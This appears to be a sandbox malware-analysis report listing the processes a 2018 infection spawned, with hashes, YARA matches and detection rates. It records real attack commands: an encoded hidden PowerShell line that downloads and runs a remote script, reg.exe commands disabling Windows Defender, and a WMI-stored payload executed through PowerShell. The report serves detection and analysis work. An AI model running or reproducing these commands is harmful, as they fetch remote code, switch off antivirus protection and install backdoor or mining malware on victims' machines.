Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\System32\cmd.exe' /c powershell.exe -nop -noni -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADEAMgA4AC4ANAAzAC4ANgAyAC8AZQBvAHAALgBwAHMAMQAnACkAKQAKAA==
Imagebase: 0x4a510000
File size: 302592 bytes
MD5 hash: AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Analysis Process: powershell.exe PID: 1828 Parent PID: 4040

General

Start time: 05:26:13
Start date: 04/09/2018
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell.exe -nop -noni -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADEAMgA4AC4ANAAzAC4ANgAyAC8AZQBvAHAALgBwAHMAMQAnACkAKQAKAA==
Imagebase: 0x21e10000
File size: 452608 bytes
MD5 hash: 92F44E405DB16AC55D97E3BFE3B132FA
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000019.00000002.1929086913.000B4000.00000004.sdmp, Author: Florian Roth
Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000019.00000002.1928783139.00090000.00000004.sdmp, Author: Florian Roth
Reputation: high

Analysis Process: cmd.exe PID: 2120 Parent PID: 3884

General

Start time: 05:26:13
Start date: 04/09/2018
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\System32\cmd.exe' /c powershell.exe -nop -noni -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADEAMgA4AC4ANAAzAC4ANgAyAC8AZQBvAHAALgBwAHMAMQAnACkAKQAKAA==
Imagebase: 0x4a510000
File size: 302592 bytes
MD5 hash: AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Analysis Process: powershell.exe PID: 2216 Parent PID: 2120

General

Start time: 05:26:15
Start date: 04/09/2018
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell.exe -nop -noni -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADEAMgA4AC4ANAAzAC4ANgAyAC8AZQBvAHAALgBwAHMAMQAnACkAKQAKAA==
Imagebase: 0x21e10000
File size: 452608 bytes
MD5 hash: 92F44E405DB16AC55D97E3BFE3B132FA
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 0000001C.00000002.1931665079.000B4000.00000004.sdmp, Author: Florian Roth
Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 0000001C.00000002.1931632180.00090000.00000004.sdmp, Author: Florian Roth
Reputation: high

Analysis Process: reg.exe PID: 2504 Parent PID: 1828

General

Start time: 05:26:16
Start date: 04/09/2018
Path: C:\Windows\System32\reg.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\reg.exe' add 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender' /v DisableAntiSpyware /t REG_DWORD /d 1 /f
Imagebase: 0xef0000
File size: 62464 bytes
MD5 hash: D69A9ABBB0D795F21995C2F48C1EB560
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Analysis Process: reg.exe PID: 2656 Parent PID: 1828

General

Start time: 05:26:18
Start date: 04/09/2018
Path: C:\Windows\System32\reg.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\reg.exe' add 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
Imagebase: 0xef0000
File size: 62464 bytes
MD5 hash: D69A9ABBB0D795F21995C2F48C1EB560
Has administrator privileges: true
Programmed in: C, C++ or other language

Analysis Process: reg.exe PID: 2660 Parent PID: 1828

General

Start time: 05:26:20
Start date: 04/09/2018
Path: C:\Windows\System32\reg.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\reg.exe' add 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
Imagebase: 0xef0000
File size: 62464 bytes
MD5 hash: D69A9ABBB0D795F21995C2F48C1EB560
Has administrator privileges: true
Programmed in: C, C++ or other language

Analysis Process: cohernece.exe PID: 2664 Parent PID: 3268

General

Start time: 05:26:24
Start date: 04/09/2018
Path: C:\Users\user\AppData\Local\Temp\cohernece.exe
Wow64 process (32bit): false
Commandline: C:\Users\HERBBL~1\AppData\Local\Temp\cohernece.exe
Imagebase: 0x400000
File size: 1827440 bytes
MD5 hash: 4FE2DE6FBB278E56C23E90432F21F6C8
Has administrator privileges: true
Programmed in: Borland Delphi
Yara matches:
Rule: ZxShell_Related_Malware_CN_Group_Jul17_2, Description: Detects a ZxShell related sample from a CN threat group, Source: 00000020.00000003.1893324898.00310000.00000040.sdmp, Author: Florian Roth
Rule: Backdoor_Nitol_Jun17, Description: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, Source: 00000020.00000003.1893324898.00310000.00000040.sdmp, Author: Florian Roth
Rule: CN_disclosed_20180208_Mal1, Description: Detects malware from disclosed CN malware set, Source: 00000020.00000003.1893324898.00310000.00000040.sdmp, Author: Florian Roth
Antivirus matches:
Detection: 100%, Avira
Detection: 74%, virustotal

Analysis Process: findstr.exe PID: 2324 Parent PID: 3268

General

Start time: 05:26:25
Start date: 04/09/2018
Path: C:\Windows\System32\findstr.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\findstr.exe' /i /m /c:cryptonight c:\windows\explorer.exe
Imagebase: 0xf20000
File size: 62976 bytes
MD5 hash: 18F02C555FBC9885DF9DB77754D6BB9B
Has administrator privileges: true
Programmed in: C, C++ or other language

Analysis Process: reg.exe PID: 1396 Parent PID: 1828

General

Start time: 05:26:26
Start date: 04/09/2018
Path: C:\Windows\System32\reg.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\reg.exe' add 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
Imagebase: 0xef0000
File size: 62464 bytes
MD5 hash: D69A9ABBB0D795F21995C2F48C1EB560
Has administrator privileges: true
Programmed in: C, C++ or other language

Analysis Process: cohernece.exe PID: 1340 Parent PID: 2664

General

Start time: 05:26:26
Start date: 04/09/2018
Path: C:\Users\user\AppData\Local\Temp\cohernece.exe
Wow64 process (32bit): false
Commandline: C:\Users\HERBBL~1\AppData\Local\Temp\cohernece.exe
Imagebase: 0x400000
File size: 1827440 bytes
MD5 hash: 4FE2DE6FBB278E56C23E90432F21F6C8
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
Rule: ZxShell_Related_Malware_CN_Group_Jul17_2, Description: Detects a ZxShell related sample from a CN threat group, Source: 00000023.00000001.1900742410.00400000.00000040.sdmp, Author: Florian Roth
Rule: Backdoor_Nitol_Jun17, Description: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, Source: 00000023.00000001.1900742410.00400000.00000040.sdmp, Author: Florian Roth
Rule: CN_disclosed_20180208_Mal1, Description: Detects malware from disclosed CN malware set, Source: 00000023.00000001.1900742410.00400000.00000040.sdmp, Author: Florian Roth
Rule: ZxShell_Related_Malware_CN_Group_Jul17_2, Description: Detects a ZxShell related sample from a CN threat group, Source: 00000023.00000000.1793672754.00400000.00000040.sdmp, Author: Florian Roth
Rule: Backdoor_Nitol_Jun17, Description: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, Source: 00000023.00000000.1793672754.00400000.00000040.sdmp, Author: Florian Roth
Rule: CN_disclosed_20180208_Mal1, Description: Detects malware from disclosed CN malware set, Source: 00000023.00000000.1793672754.00400000.00000040.sdmp, Author: Florian Roth

Analysis Process: findstr.exe PID: 756 Parent PID: 3268

General

Start time: 05:26:27
Start date: 04/09/2018
Path: C:\Windows\System32\findstr.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\findstr.exe' /i /m /c:cryptonight 'c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppsvc.exe'
Imagebase: 0x500000
File size: 62976 bytes
MD5 hash: 18F02C555FBC9885DF9DB77754D6BB9B
Has administrator privileges: true
Programmed in: C, C++ or other language

Analysis Process: powershell.exe PID: 2396 Parent PID: 3268

General

Start time: 05:26:28
Start date: 04/09/2018
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden '$mon = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['funs'].Value;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)));Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($mon, $mon, 'Void', 0, '', '')'
Imagebase: 0x21e10000
File size: 452608 bytes
MD5 hash: 92F44E405DB16AC55D97E3BFE3B132FA
Has administrator privileges: true
Programmed in: .Net C# or VB.NET

Analysis Process: NETSTAT.EXE PID: 2648 Parent PID: 3268

General

Start time: 05:27:08
Start date: 04/09/2018
Path: C:\Windows\System32\NETSTAT.EXE
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp
Imagebase: 0x370000
File size: 27136 bytes
MD5 hash: 32297BB17E6EC700D0FC869F9ACAF561
Has administrator privileges: true
Programmed in: C, C++ or other language

Analysis Process: reg.exe PID: 2212 Parent PID: 2216

General

Start time: 05:27:13
Start date: 04/09/2018
Path: C:\Windows\System32\reg.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\reg.exe' add 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender' /v DisableAntiSpyware /t REG_DWORD /d 1 /f
Imagebase: 0xef0000
File size: 62464 bytes
MD5 hash: D69A9ABBB0D795F21995C2F48C1EB560
Has administrator privileges: true
Programmed in: C, C++ or other language

Disassembly

Code Analysis
